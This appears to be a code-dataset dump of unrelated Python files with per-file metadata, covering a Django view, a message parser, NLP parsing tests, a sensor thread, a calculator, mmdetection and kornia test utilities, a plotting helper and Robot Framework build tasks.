return redirect(reverse('forums:forum_detail', args=[pk]))
class CommentDeleteView(OwnerDeleteView):
model = Comment
template_name = "forums/comment_delete.html"
# https://stackoverflow.com/questions/26290415/deleteview-with-a-dynamic-success-url-dependent-on-id
def get_success_url(self):
forum = self.object.forum
return reverse('forums:forum_detail', args=[forum.id])
| forums/views.py | 1,948 | https://stackoverflow.com/questions/26290415/deleteview-with-a-dynamic-success-url-dependent-on-id | 98 | en | 0.738848 |
#!/usr/bin/env python
"""Parse a keyword-value message.
History:
2002-12-16 ROwen
2003-06-25 ROwen Modified to return an opscore.RO.Alg.OrderedDict
2003-11-19 ROwen Modified header: keywords with no values may have an '='.
Added "noValKey=" to test cases as it caused an infinite loop.
2004-05-18 ROwen Modified test code to use astr instead of str.
2014-09-17 ROwen Modified to test for Exception instead of StandardError
2015-11-03 ROwen Replace "!= None" with "is not None" to modernize the code.
"""
__all__ = ["parseKeyValueData"]
from .GetKeyword import getKeyword
from .GetValues import getValues
import opscore.RO.Alg
def parseKeyValueData(astr):
"""Parses a string of the form:
'keyword1=value11, value12,...; keyword2=value21, value22; keyword3=; keyword4; ...'
returning an opscore.RO.Alg.OrderedDict of the form:
{keyword1:(value11, value12,...), keyword2:(value21, value22, ...),
keyword3: (), keyword4: (), ...}
Inputs:
- astr: the string to parse, of the form:
keyword1=value11, value12,...; keyword2=value21, value22...
where:
- keyword is a keyword; it must start with a letter or underscore
and may contain those characters or digits thereafter.
- value is the value of the keyword, one of:
an integer
a floating point number
a string delimited by a pair of single or double quotes
any enclosed characters identical to the delimiter
should be escaped by doubling or preceding with a backslash
- Each keyword may have zero or more comma-separated values;
if it has zero values then the equals sign may be omitted.
Returns dataDict, an opscore.RO.Alg.OrderedDict of keyword: valueTuple entries,
one for each keyword. Details:
- The keywords are given in the order they were specified in the message.
- If the keyword has no values, valueTuple is ()
- If the keyword has one value, valueTuple is (value,)
"""
dataDict = opscore.RO.Alg.OrderedDict()
if astr == '':
return dataDict
nextInd = 0
while nextInd is not None:
keyword, nextInd = getKeyword(astr, nextInd)
# print "got keyword %r; nextInd = %r" % (keyword, nextInd)
valueTuple, nextInd = getValues(astr, nextInd)
# print "got valueTuple %r; nextInd = %r" % (valueTuple, nextInd)
dataDict[keyword] = valueTuple
return dataDict
if __name__ == '__main__':
# perform test
print("testing parseHubMsg\n")
testList = [
"keyword",
"",
"strSet='quoted \"string\" 1', 'quoted \"string\" 2', unquotedstr3",
"genSet=1, 2, 3.14159, 'str4', 'str5'",
"noValKey1=",
"noValKey1",
"noValKey1; intKey2=2; noValKey3=; noValKey4 = ; noValKey5",
]
for astr in testList:
try:
dataDict = parseKeyValueData(astr)
print("parseHubMsg(%r) = {" % (astr,))
for key, value in dataDict.items():
print(" %r: %r" % (key, value))
print("}")
except Exception as e:
print("failed with error: ", e)
| python/opscore/RO/ParseMsg/ParseData.py | 3,168 | Parses a string of the form:
'keyword1=value11, value12,...; keyword2=value21, value22; keyword3=; keyword4; ...'
returning an opscore.RO.Alg.OrderedDict of the form:
{keyword1:(value11, value12,...), keyword2:(value21, value22, ...),
keyword3: (), keyword4: (), ...}
Inputs:
- astr: the string to parse, of the form:
keyword1=value11, value12,...; keyword2=value21, value22...
where:
- keyword is a keyword; it must start with a letter or underscore
and may contain those characters or digits thereafter.
- value is the value of the keyword, one of:
an integer
a floating point number
a string delimited by a pair of single or double quotes
any enclosed characters identical to the delimiter
should be escaped by doubling or preceding with a backslash
- Each keyword may have zero or more comma-separated values;
if it has zero values then the equals sign may be omitted.
Returns dataDict, an opscore.RO.Alg.OrderedDict of keyword: valueTuple entries,
one for each keyword. Details:
- The keywords are given in the order they were specified in the message.
- If the keyword has no values, valueTuple is ()
- If the keyword has one value, valueTuple is (value,)
Parse a keyword-value message.
History:
2002-12-16 ROwen
2003-06-25 ROwen Modified to return an opscore.RO.Alg.OrderedDict
2003-11-19 ROwen Modified header: keywords with no values may have an '='.
Added "noValKey=" to test cases as it caused an infinite loop.
2004-05-18 ROwen Modified test code to use astr instead of str.
2014-09-17 ROwen Modified to test for Exception instead of StandardError
2015-11-03 ROwen Replace "!= None" with "is not None" to modernize the code.
!/usr/bin/env python print "got keyword %r; nextInd = %r" % (keyword, nextInd) print "got valueTuple %r; nextInd = %r" % (valueTuple, nextInd) perform test | 1,884 | en | 0.642889 |
# -*- coding: utf-8 -*-
#
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
from datetime import datetime, time
from lingua_franca.parse import extract_datetime
from lingua_franca.parse import extract_number
from lingua_franca.parse import normalize
class TestNormalize(unittest.TestCase):
def test_extractnumber_sv(self):
self.assertEqual(extract_number("1 och en halv deciliter",
lang='sv-se'), 1.5)
self.assertEqual(extract_number("det här är det första testet",
lang='sv-se'), 1)
self.assertEqual(extract_number("det här är test nummer 2",
lang='sv-se'), 2)
self.assertEqual(extract_number("det här är det andra testet",
lang='sv-se'), 2)
self.assertEqual(extract_number("det här är tredje testet",
lang='sv-se'), 3)
self.assertEqual(extract_number("det här är test nummer 4",
lang='sv-se'), 4)
self.assertEqual(extract_number("en tredjedels dl",
lang='sv-se'), 1.0 / 3.0)
self.assertEqual(extract_number("tre deciliter",
lang='sv-se'), 3)
self.assertEqual(extract_number("1/3 deciliter",
lang='sv-se'), 1.0 / 3.0)
self.assertEqual(extract_number("en kvarts dl",
lang='sv-se'), 0.25)
self.assertEqual(extract_number("1/4 dl",
lang='sv-se'), 0.25)
self.assertEqual(extract_number("en kvarts dl",
lang='sv-se'), 0.25)
self.assertEqual(extract_number("2/3 dl",
lang='sv-se'), 2.0 / 3.0)
self.assertEqual(extract_number("3/4 dl",
lang='sv-se'), 3.0 / 4.0)
self.assertEqual(extract_number("1 och 3/4 dl",
lang='sv-se'), 1.75)
self.assertEqual(extract_number("tre fjärdedels dl",
lang='sv-se'), 3.0 / 4.0)
self.assertEqual(extract_number("trekvarts kopp",
lang='sv-se'), 3.0 / 4.0)
def test_extractdatetime_sv(self):
def extractWithFormat(text):
date = datetime(2017, 6, 27, 0, 0)
[extractedDate, leftover] = extract_datetime(text, date,
lang='sv-se')
extractedDate = extractedDate.strftime("%Y-%m-%d %H:%M:%S")
return [extractedDate, leftover]
def testExtract(text, expected_date, expected_leftover):
res = extractWithFormat(text)
self.assertEqual(res[0], expected_date)
self.assertEqual(res[1], expected_leftover)
testExtract("Planera bakhållet 5 dagar från nu",
"2017-07-02 00:00:00", "planera bakhållet")
testExtract("Vad blir vädret i övermorgon?",
"2017-06-29 00:00:00", "vad blir vädret")
testExtract("Påminn mig klockan 10:45",
"2017-06-27 10:45:00", "påminn mig klockan")
testExtract("vad blir vädret på fredag morgon",
"2017-06-30 08:00:00", "vad blir vädret")
testExtract("vad blir morgondagens väder",
"2017-06-28 00:00:00", "vad blir väder")
testExtract("påminn mig att ringa mamma om 8 veckor och 2 dagar",
"2017-08-24 00:00:00", "påminn mig att ringa mamma om och")
testExtract("Spela Kurt Olssons musik 2 dagar från Fredag",
"2017-07-02 00:00:00", "spela kurt olssons musik")
testExtract("vi möts 20:00",
"2017-06-27 20:00:00", "vi möts")
def test_extractdatetime_default_sv(self):
default = time(9, 0, 0)
anchor = datetime(2017, 6, 27, 0, 0)
res = extract_datetime('påminn mig att klippa mig på fredag',
anchor, lang='sv-se', default_time=default)
self.assertEqual(default, res[0].time())
def test_numbers(self):
self.assertEqual(normalize("det här är ett ett två tre test",
lang='sv-se'),
"det här är 1 1 2 3 test")
self.assertEqual(normalize(" det är fyra fem sex test",
lang='sv-se'),
"det är 4 5 6 test")
self.assertEqual(normalize("det är sju åtta nio test",
lang='sv-se'),
"det är 7 8 9 test")
self.assertEqual(normalize("det är tio elva tolv test",
lang='sv-se'),
"det är 10 11 12 test")
self.assertEqual(normalize("det är arton nitton tjugo test",
lang='sv-se'),
"det är 18 19 20 test")
if __name__ == "__main__":
unittest.main()
| test/test_parse_sv.py | 5,778 | -*- coding: utf-8 -*- Copyright 2017 Mycroft AI Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. | 573 | en | 0.857543 |
# -----------------------------------------------------
# File: temperature.py
# Author: Tanner L
# Date: 09/20/19
# Desc: Temperature sensor communication
# Inputs:
# Outputs: temperature
# -----------------------------------------------------
import threading as th
import logging
import time
import interface
import adafruit_dht # import library for temperature sensor
import board
# -----------------------------------------------------
# Function: class - temperatureThread
# Author: Tanner L
# Date: 10/10/19
# Desc: Adjusts gps values based on settings for display
# Inputs:
# Outputs:
# -----------------------------------------------------
class TemperatureThread(th.Thread):
def __init__(self):
th.Thread.__init__(self)
logging.info('--------------------TEMPERATURE START----------------------------')
self.go = True
# -----------------------------------------------------
# Function: run
# Author: Tanner L
# Date: 10/10/19
# Desc: Loop for temperatureThread, gets temperature from sensor
# Inputs:
# Outputs:
# -----------------------------------------------------
def run(self):
sensor = adafruit_dht.DHT11(board.D16) # setup dht11 to be read
while self.go:
try:
interface.temperature_queue = sensor.temperature # read in temperature
except:
logging.error('Temperature Sensor Error')
print('Temp Read Error')
if interface.temperature_queue <= 0:
time.sleep(1) # send new temperature every 1 seconds
else:
time.sleep(10)
# -----------------------------------------------------
# Function: stop_thread
# Author: Tanner L
# Date: 10/10/19
# Desc: Stops thread for shutdown
# -----------------------------------------------------
def stop_thread(self): # used to kill thread
self.go = False
| byke_interface/temperature.py | 1,959 | ----------------------------------------------------- File: temperature.py Author: Tanner L Date: 09/20/19 Desc: Temperature sensor communication Inputs: Outputs: temperature ----------------------------------------------------- import library for temperature sensor ----------------------------------------------------- Function: class - temperatureThread Author: Tanner L Date: 10/10/19 Desc: Adjusts gps values based on settings for display Inputs: Outputs: ----------------------------------------------------- ----------------------------------------------------- Function: run Author: Tanner L Date: 10/10/19 Desc: Loop for temperatureThread, gets temperature from sensor Inputs: Outputs: ----------------------------------------------------- setup dht11 to be read read in temperature send new temperature every 1 seconds ----------------------------------------------------- Function: stop_thread Author: Tanner L Date: 10/10/19 Desc: Stops thread for shutdown ----------------------------------------------------- used to kill thread | 1,042 | en | 0.440015 |
# while ve if ile hesap makinesi ornegi
giriş = """
(1) topla
(2) çıkar
(3) çarp
(4) böl
(5) karesini hesapla
(6) karekök hesapla
(7) cikis
"""
print(giriş)
while True:
soru = int(input("Yapmak istediğiniz işlemin numarasını girin : "))
if soru == 7:
print("çıkılıyor...")
break
elif soru == 1:
sayı1 = int(input("Toplama işlemi için ilk sayıyı girin : "))
sayı2 = int(input("Toplama işlemi için ikinci sayıyı girin : "))
print(sayı1, "+", sayı2, "=", sayı1 + sayı2)
elif soru == 2:
sayı3 = int(input("Çıkarma işlemi için ilk sayıyı girin : "))
sayı4 = int(input("Çıkarma işlemi için ikinci sayıyı girin : "))
print(sayı3, "-", sayı4, "=", sayı3 - sayı4)
elif soru == 3:
sayı5 = int(input("Çarpma işlemi için ilk sayıyı girin : "))
sayı6 = int(input("Çarpma işlemi için ikinci sayıyı girin : "))
print(sayı5, "x", sayı6, "=", sayı5 * sayı6)
elif soru == 4:
sayı7 = int(input("Bölme işlemi için ilk sayıyı girin : "))
sayı8 = int(input("Bölme işlemi için ikinci sayıyı girin : "))
print(sayı7, "/", sayı8, "=", sayı7 / sayı8)
elif soru == 5:
sayı9 = int(input("Karesini hesaplamak istediğiniz sayıyı girin : "))
print(sayı9, "sayısının karesi = ", sayı9 ** 2)
elif soru == 6:
sayı10 = int(input("Karekökünü hesaplamak istediğiniz sayıyı girin: "))
print(sayı10, "sayısının karekökü = ", sayı10 ** 0.5)
else:
print("Yanlış giriş.")
print("Aşağıdaki seçeneklerden birini giriniz :", giriş)
| 04-hesap-makinesi.py | 1,754 | while ve if ile hesap makinesi ornegi | 37 | tr | 0.647911 |
import os.path as osp
import pickle
import shutil
import tempfile
import time
import mmcv
import torch
import torch.distributed as dist
from mmcv.image import tensor2imgs
from mmcv.runner import get_dist_info
from mmdet.core import encode_mask_results
def single_gpu_test(model,
data_loader,
show=False,
out_dir=None,
show_score_thr=0.3):
model.eval()
results = []
dataset = data_loader.dataset
prog_bar = mmcv.ProgressBar(len(dataset))
for i, data in enumerate(data_loader):
with torch.no_grad():
result = model(return_loss=False, rescale=True, **data)
batch_size = len(result)
if show or out_dir:
if batch_size == 1 and isinstance(data['img'][0], torch.Tensor):
img_tensor = data['img'][0]
else:
img_tensor = data['img'][0].data[0]
img_metas = data['img_metas'][0].data[0]
imgs = tensor2imgs(img_tensor, **img_metas[0]['img_norm_cfg'])
assert len(imgs) == len(img_metas)
for i, (img, img_meta) in enumerate(zip(imgs, img_metas)):
h, w, _ = img_meta['img_shape']
img_show = img[:h, :w, :]
ori_h, ori_w = img_meta['ori_shape'][:-1]
img_show = mmcv.imresize(img_show, (ori_w, ori_h))
if out_dir:
out_file = osp.join(out_dir, img_meta['ori_filename'])
else:
out_file = None
model.module.show_result(
img_show,
result[i],
show=show,
out_file=out_file,
score_thr=show_score_thr)
# encode mask results
if isinstance(result[0], tuple):
result = [(bbox_results, encode_mask_results(mask_results))
for bbox_results, mask_results in result]
results.extend(result)
for _ in range(batch_size):
prog_bar.update()
return results
def multi_gpu_test(model, data_loader, tmpdir=None, gpu_collect=False):
"""Test model with multiple gpus.
This method tests model with multiple gpus and collects the results
under two different modes: gpu and cpu modes. By setting 'gpu_collect=True'
it encodes results to gpu tensors and use gpu communication for results
collection. On cpu mode it saves the results on different gpus to 'tmpdir'
and collects them by the rank 0 worker.
Args:
model (nn.Module): Model to be tested.
data_loader (nn.Dataloader): Pytorch data loader.
tmpdir (str): Path of directory to save the temporary results from
different gpus under cpu mode.
gpu_collect (bool): Option to use either gpu or cpu to collect results.
Returns:
list: The prediction results.
"""
model.eval()
results = []
dataset = data_loader.dataset
rank, world_size = get_dist_info()
if rank == 0:
prog_bar = mmcv.ProgressBar(len(dataset))
time.sleep(2) # This line can prevent deadlock problem in some cases.
for i, data in enumerate(data_loader):
with torch.no_grad():
result = model(return_loss=False, rescale=True, **data)
# encode mask results
if isinstance(result[0], tuple):
result = [(bbox_results, encode_mask_results(mask_results))
for bbox_results, mask_results in result]
results.extend(result)
if rank == 0:
batch_size = len(result)
for _ in range(batch_size * world_size):
prog_bar.update()
# collect results from all ranks
if gpu_collect:
results = collect_results_gpu(results, len(dataset))
else:
results = collect_results_cpu(results, len(dataset), tmpdir)
return results
def collect_results_cpu(result_part, size, tmpdir=None):
rank, world_size = get_dist_info()
# create a tmp dir if it is not specified
if tmpdir is None:
MAX_LEN = 512
# 32 is whitespace
dir_tensor = torch.full((MAX_LEN,),
32,
dtype=torch.uint8,
device='cuda')
if rank == 0:
mmcv.mkdir_or_exist('.dist_test')
tmpdir = tempfile.mkdtemp(dir='.dist_test')
tmpdir = torch.tensor(
bytearray(tmpdir.encode()), dtype=torch.uint8, device='cuda')
dir_tensor[:len(tmpdir)] = tmpdir
dist.broadcast(dir_tensor, 0)
tmpdir = dir_tensor.cpu().numpy().tobytes().decode().rstrip()
else:
mmcv.mkdir_or_exist(tmpdir)
# dump the part result to the dir
mmcv.dump(result_part, osp.join(tmpdir, f'part_{rank}.pkl'))
dist.barrier()
# collect all parts
if rank != 0:
return None
else:
# load results of all parts from tmp dir
part_list = []
for i in range(world_size):
part_file = osp.join(tmpdir, f'part_{i}.pkl')
part_list.append(mmcv.load(part_file))
# sort the results
ordered_results = []
for res in zip(*part_list):
ordered_results.extend(list(res))
# the dataloader may pad some samples
ordered_results = ordered_results[:size]
# remove tmp dir
shutil.rmtree(tmpdir)
return ordered_results
def collect_results_gpu(result_part, size):
rank, world_size = get_dist_info()
# dump result part to tensor with pickle
part_tensor = torch.tensor(
bytearray(pickle.dumps(result_part)), dtype=torch.uint8, device='cuda')
# gather all result part tensor shape
shape_tensor = torch.tensor(part_tensor.shape, device='cuda')
shape_list = [shape_tensor.clone() for _ in range(world_size)]
dist.all_gather(shape_list, shape_tensor)
# padding result part tensor to max length
shape_max = torch.tensor(shape_list).max()
part_send = torch.zeros(shape_max, dtype=torch.uint8, device='cuda')
part_send[:shape_tensor[0]] = part_tensor
part_recv_list = [
part_tensor.new_zeros(shape_max) for _ in range(world_size)
]
# gather all result part
dist.all_gather(part_recv_list, part_send)
if rank == 0:
part_list = []
for recv, shape in zip(part_recv_list, shape_list):
part_list.append(
pickle.loads(recv[:shape[0]].cpu().numpy().tobytes()))
# sort the results
ordered_results = []
for res in zip(*part_list):
ordered_results.extend(list(res))
# the dataloader may pad some samples
ordered_results = ordered_results[:size]
return ordered_results
| mmdetection/mmdet/apis/test.py | 6,825 | Test model with multiple gpus.
This method tests model with multiple gpus and collects the results
under two different modes: gpu and cpu modes. By setting 'gpu_collect=True'
it encodes results to gpu tensors and use gpu communication for results
collection. On cpu mode it saves the results on different gpus to 'tmpdir'
and collects them by the rank 0 worker.
Args:
model (nn.Module): Model to be tested.
data_loader (nn.Dataloader): Pytorch data loader.
tmpdir (str): Path of directory to save the temporary results from
different gpus under cpu mode.
gpu_collect (bool): Option to use either gpu or cpu to collect results.
Returns:
list: The prediction results.
encode mask results This line can prevent deadlock problem in some cases. encode mask results collect results from all ranks create a tmp dir if it is not specified 32 is whitespace dump the part result to the dir collect all parts load results of all parts from tmp dir sort the results the dataloader may pad some samples remove tmp dir dump result part to tensor with pickle gather all result part tensor shape padding result part tensor to max length gather all result part sort the results the dataloader may pad some samples | 1,229 | en | 0.774713 |
"""
Toxopy (https://github.com/bchaselab/Toxopy)
© M. Alyetama, University of Nebraska at Omaha
Licensed under the terms of the MIT license
"""
from toxopy import fwarnings, trials
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
def dlcboxplot(file,
variable,
ylab,
comparison,
jitter=False,
colors=False,
title=False,
save=False,
output_dir=None):
"""
file is typically 'dlc_all_avgs_updated.csv'
variable is either 'cat_ditance' or 'vel'
ylab is the y-axis label
colors is a list of two colors (e.g., ["#0062FF", "#DB62FF"])
output_dir to save the plot in a specific dir when save is True
"""
df = pd.read_csv(file)
tls = trials()
new = ['FT', 'ALONE1', 'SALINE1', 'ALONE2', 'URINE1',
'ALONE3', 'SALINE2', 'ALONE4', 'URINE2', 'ALONE5']
if variable == 'distance':
df = df[(df['trial'].isin(tls[0::2]))]
d = {}
for i, j in zip(new, tls):
d[j] = i
df = df.replace(d)
df = df[df['var'] == variable]
sns.set(style='ticks', font_scale=1)
plt.figure(figsize=(13, 5), dpi=100)
if comparison == 'infection_status':
test, control = 'Infected', 'Control'
comparing = 'infection_status'
legend = 'Infection Status'
elif comparison == 'indoor_outdoor_status':
test, control = 'Indoor-outdoor', 'Indoor'
comparing = 'indoor_outdoor_status'
legend = 'Indoor-outdoor Status'
if colors is False:
my_pal = {control: '#00FFFF', test: '#E60E3C'}
else:
my_pal = {control: colors[0], test: colors[1]}
ax = sns.boxplot(x='trial',
y='value',
data=df,
hue=comparing,
palette=my_pal)
if jitter is True:
sns.stripplot(x='trial',
y='value',
data=df,
color='black',
size=3,
jitter=1)
if variable != 'distance':
for i in range(len(df['trial'].unique())-1):
if variable == 'vel':
plt.vlines(i+.5, 10, 45, linestyles='solid',
colors='black', alpha=0.2)
elif variable == 'cat_distance':
plt.vlines(i+.5, 0, 1.3, linestyles='solid',
colors='black', alpha=0.2)
if title is not False:
plt.title(title, fontsize=12)
else:
pass
ax.set_xlabel('Trial', fontsize=12)
ax.set_ylabel(ylab, fontsize=12)
ax.legend(title=legend)
plt.legend(title=legend)
'''add significance bars and asterisks between boxes.
[first pair, second pair], ..., [|, –], ...'''
if variable == 'vel':
l = [[7.75, 5.75], [8.25, 6.25], [26, 28], [31, 33]]
elif variable == 'cat_distance':
l = [[7.75, 5.75], [8.25, 6.25], [0.85, 0.9], [0.95, 1]]
for x1, x2, y1, y2 in zip(l[0], l[1], l[2], l[3]):
sig = plt.plot([x1, x1, x2, x2], [y1, y2, y2, y1],
linewidth=1,
color='k')
plt.text((x1 + x2) * .5, y2 + 0, "*",
ha='center', va='bottom', fontsize=18)
plt.show()
fig = ax.get_figure()
if save is True:
def sav(myString):
return fig.savefig(myString,
bbox_inches='tight',
dpi=100,
pad_inches=0.1)
if output_dir is not None:
sav(f'{output_dir}/{variable}.png')
else:
sav(f'{variable}.png')
| toxopy/dlcboxplot.py | 3,718 | file is typically 'dlc_all_avgs_updated.csv'
variable is either 'cat_ditance' or 'vel'
ylab is the y-axis label
colors is a list of two colors (e.g., ["#0062FF", "#DB62FF"])
output_dir to save the plot in a specific dir when save is True
Toxopy (https://github.com/bchaselab/Toxopy)
© M. Alyetama, University of Nebraska at Omaha
Licensed under the terms of the MIT license | 373 | en | 0.780567 |
import logging
import pytest
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import kornia as kornia
logger = logging.getLogger(__name__)
class TestIntegrationFocalLoss:
# optimization
thresh = 1e-1
lr = 1e-3
num_iterations = 1000
num_classes = 2
# focal loss
alpha = 2.0
gamma = 2.0
def generate_sample(self, base_target, std_val=0.1):
target = base_target.float() / base_target.max()
noise = std_val * torch.rand(1, 1, 6, 5)
return target + noise
@staticmethod
def init_weights(m):
if isinstance(m, nn.Conv2d):
torch.nn.init.xavier_uniform_(m.weight)
def test_conv2d_relu(self):
# we generate base sample
target = torch.LongTensor(1, 6, 5).fill_(0)
for i in range(1, self.num_classes):
target[..., i:-i, i:-i] = i
m = nn.Sequential(
nn.Conv2d(1, self.num_classes, kernel_size=3, padding=1),
nn.ReLU(True),
)
m.apply(self.init_weights)
optimizer = optim.Adam(m.parameters(), lr=self.lr)
criterion = kornia.losses.FocalLoss(
alpha=self.alpha, gamma=self.gamma, reduction='mean')
# NOTE: uncomment to compare against vanilla cross entropy
# criterion = nn.CrossEntropyLoss()
for iter_id in range(self.num_iterations):
sample = self.generate_sample(target)
output = m(sample)
loss = criterion(output, target)
logger.debug("Loss: {}".format(loss.item()))
optimizer.zero_grad()
loss.backward()
optimizer.step()
sample = self.generate_sample(target)
output_argmax = torch.argmax(m(sample), dim=1)
logger.debug("Output argmax: \n{}".format(output_argmax))
# TODO(edgar): replace by IoU or find a more stable solution
# for this test. The issue is that depending on
# the seed to initialize the weights affects the
# final results and slows down the convergence of
# the algorithm.
val = F.mse_loss(output_argmax.float(), target.float())
if not val.item() < self.thresh:
pytest.xfail("Wrong seed or initial weight values.")
| test/integration/test_focal.py | 2,336 | optimization focal loss we generate base sample NOTE: uncomment to compare against vanilla cross entropy criterion = nn.CrossEntropyLoss() TODO(edgar): replace by IoU or find a more stable solution for this test. The issue is that depending on the seed to initialize the weights affects the final results and slows down the convergence of the algorithm. | 405 | en | 0.838931 |
"""Tasks to help Robot Framework packaging and other development.
Executed by Invoke <http://pyinvoke.org>. Install it with `pip install invoke`
and run `invoke --help` and `invoke --list` for details how to execute tasks.
See BUILD.rst for packaging and releasing instructions.
"""
from pathlib import Path
from urllib.request import urlretrieve
import os
import shutil
import sys
import tarfile
import tempfile
import zipfile
assert Path.cwd().resolve() == Path(__file__).resolve().parent
sys.path.insert(0, 'src')
from invoke import Exit, task
from rellu import initialize_labels, ReleaseNotesGenerator, Version
from rellu.tasks import clean
from robot.libdoc import libdoc
REPOSITORY = 'robotframework/robotframework'
VERSION_PATH = Path('src/robot/version.py')
VERSION_PATTERN = "VERSION = '(.*)'"
POM_PATH = Path('pom.xml')
POM_VERSION_PATTERN = '<version>(.*)</version>'
RELEASE_NOTES_PATH = Path('doc/releasenotes/rf-{version}.rst')
RELEASE_NOTES_TITLE = 'Robot Framework {version}'
RELEASE_NOTES_INTRO = '''
`Robot Framework`_ {version} is a new release with **UPDATE** enhancements
and bug fixes. **MORE intro stuff...**
**REMOVE reference to tracker if release notes contain all issues.**
All issues targeted for Robot Framework {version.milestone} can be found
from the `issue tracker milestone`_.
Questions and comments related to the release can be sent to the
`robotframework-users`_ mailing list or to `Robot Framework Slack`_,
and possible bugs submitted to the `issue tracker`_.
**REMOVE ``--pre`` from the next command with final releases.**
If you have pip_ installed, just run
::
pip install --pre --upgrade robotframework
to install the latest available release or use
::
pip install robotframework=={version}
to install exactly this version. Alternatively you can download the source
distribution from PyPI_ and install it manually. For more details and other
installation approaches, see the `installation instructions`_.
Robot Framework {version} was released on {date}.
.. _Robot Framework: http://robotframework.org
.. _pip: http://pip-installer.org
.. _PyPI: https://pypi.python.org/pypi/robotframework
.. _issue tracker milestone: https://github.com/robotframework/robotframework/issues?q=milestone%3A{version.milestone}
.. _issue tracker: https://github.com/robotframework/robotframework/issues
.. _robotframework-users: http://groups.google.com/group/robotframework-users
.. _Robot Framework Slack: https://robotframework-slack-invite.herokuapp.com
.. _installation instructions: ../../INSTALL.rst
'''
@task
def set_version(ctx, version):
"""Set project version in `src/robot/version.py`` file.
Args:
version: Project version to set or ``dev`` to set development version.
Following PEP-440 compatible version numbers are supported:
- Final version like 3.0 or 3.1.2.
- Alpha, beta or release candidate with ``a``, ``b`` or ``rc`` postfix,
respectively, and an incremented number like 3.0a1 or 3.0.1rc1.
- Development version with ``.dev`` postix and an incremented number like
3.0.dev1 or 3.1a1.dev2.
When the given version is ``dev``, the existing version number is updated
to the next suitable development version. For example, 3.0 -> 3.0.1.dev1,
3.1.1 -> 3.1.2.dev1, 3.2a1 -> 3.2a2.dev1, 3.2.dev1 -> 3.2.dev2.
"""
version = Version(version, VERSION_PATH, VERSION_PATTERN)
version.write()
pom = Version(str(version), POM_PATH, POM_VERSION_PATTERN)
pom.write()
print(version)
@task
def print_version(ctx):
"""Print the current project version."""
print(Version(path=VERSION_PATH, pattern=VERSION_PATTERN))
@task
def library_docs(ctx, name):
"""Generate standard library documentation.
Args:
name: Name of the library or ``all`` to generate docs for all libs.
Name is case-insensitive and can be shortened as long as it
is a unique prefix. For example, ``b`` is equivalent to
``BuiltIn`` and ``di`` equivalent to ``Dialogs``.
"""
libraries = ['BuiltIn', 'Collections', 'DateTime', 'Dialogs',
'OperatingSystem', 'Process', 'Screenshot', 'String',
'Telnet', 'XML']
name = name.lower()
if name != 'all':
libraries = [lib for lib in libraries if lib.lower().startswith(name)]
if len(libraries) != 1:
raise Exit(f"'{name}' is not a unique library prefix.")
for lib in libraries:
libdoc(lib, str(Path(f'doc/libraries/{lib}.html')))
@task
def release_notes(ctx, version=None, username=None, password=None, write=False):
"""Generate release notes based on issues in the issue tracker.
Args:
version: Generate release notes for this version. If not given,
generated them for the current version.
username: GitHub username.
password: GitHub password.
write: When set to True, write release notes to a file overwriting
possible existing file. Otherwise just print them to the
terminal.
Username and password can also be specified using ``GITHUB_USERNAME`` and
``GITHUB_PASSWORD`` environment variable, respectively. If they aren't
specified at all, communication with GitHub is anonymous and typically
pretty slow.
"""
version = Version(version, VERSION_PATH, VERSION_PATTERN)
file = RELEASE_NOTES_PATH if write else sys.stdout
generator = ReleaseNotesGenerator(REPOSITORY, RELEASE_NOTES_TITLE,
RELEASE_NOTES_INTRO)
generator.generate(version, username, password, file)
@task
def init_labels(ctx, username=None, password=None):
"""Initialize project by setting labels in the issue tracker.
Args:
username: GitHub username.
password: GitHub password.
Username and password can also be specified using ``GITHUB_USERNAME`` and
``GITHUB_PASSWORD`` environment variable, respectively.
Should only be executed once when taking ``rellu`` tooling to use or
when labels it uses have changed.
"""
initialize_labels(REPOSITORY, username, password)
@task
def jar(ctx, jython_version='2.7.0', pyyaml_version='3.11', remove_dist=False):
"""Create JAR distribution.
Downloads Jython JAR and PyYAML if needed.
Args:
jython_version: Jython version to use as a base. Must match version in
`jython-standalone-<version>.jar` found from Maven central.
pyyaml_version: Version of PyYAML that will be included in the
standalone jar. The version must be available from PyPI.
remove_dist: Control is 'dist' directory initially removed or not.
"""
clean(ctx, remove_dist, create_dirs=True)
jython_jar = get_jython_jar(jython_version)
print(f"Using '{jython_jar}'.")
compile_java_files(ctx, jython_jar)
unzip_jar(jython_jar)
copy_robot_files()
pyaml_archive = get_pyyaml(pyyaml_version)
extract_and_copy_pyyaml_files(pyyaml_version, pyaml_archive)
compile_python_files(ctx, jython_jar)
version = Version(path=VERSION_PATH, pattern=VERSION_PATTERN)
create_robot_jar(ctx, str(version))
def get_jython_jar(version):
filename = 'jython-standalone-{0}.jar'.format(version)
url = (f'http://search.maven.org/remotecontent?filepath=org/python/'
f'jython-standalone/{version}/{filename}')
return get_extlib_file(filename, url)
def get_pyyaml(version):
filename = f'PyYAML-{version}.tar.gz'
url = f'https://pypi.python.org/packages/source/P/PyYAML/{filename}'
return get_extlib_file(filename, url)
def get_extlib_file(filename, url):
lib = Path('ext-lib')
path = Path(lib, filename)
if path.exists():
return path
print(f"'{filename}' not found, downloading it from '{url}'.")
lib.mkdir(exist_ok=True)
urlretrieve(url, path)
return path
def extract_and_copy_pyyaml_files(version, filename, build_dir='build'):
extracted = Path(tempfile.gettempdir(), 'pyyaml-for-robot')
if extracted.is_dir():
shutil.rmtree(str(extracted))
print(f"Extracting '{filename}' to '{extracted}'.")
with tarfile.open(filename) as t:
t.extractall(extracted)
source = Path(extracted, f'PyYAML-{version}', 'lib', 'yaml')
target = Path(build_dir, 'Lib', 'yaml')
shutil.copytree(str(source), str(target),
ignore=shutil.ignore_patterns('*.pyc'))
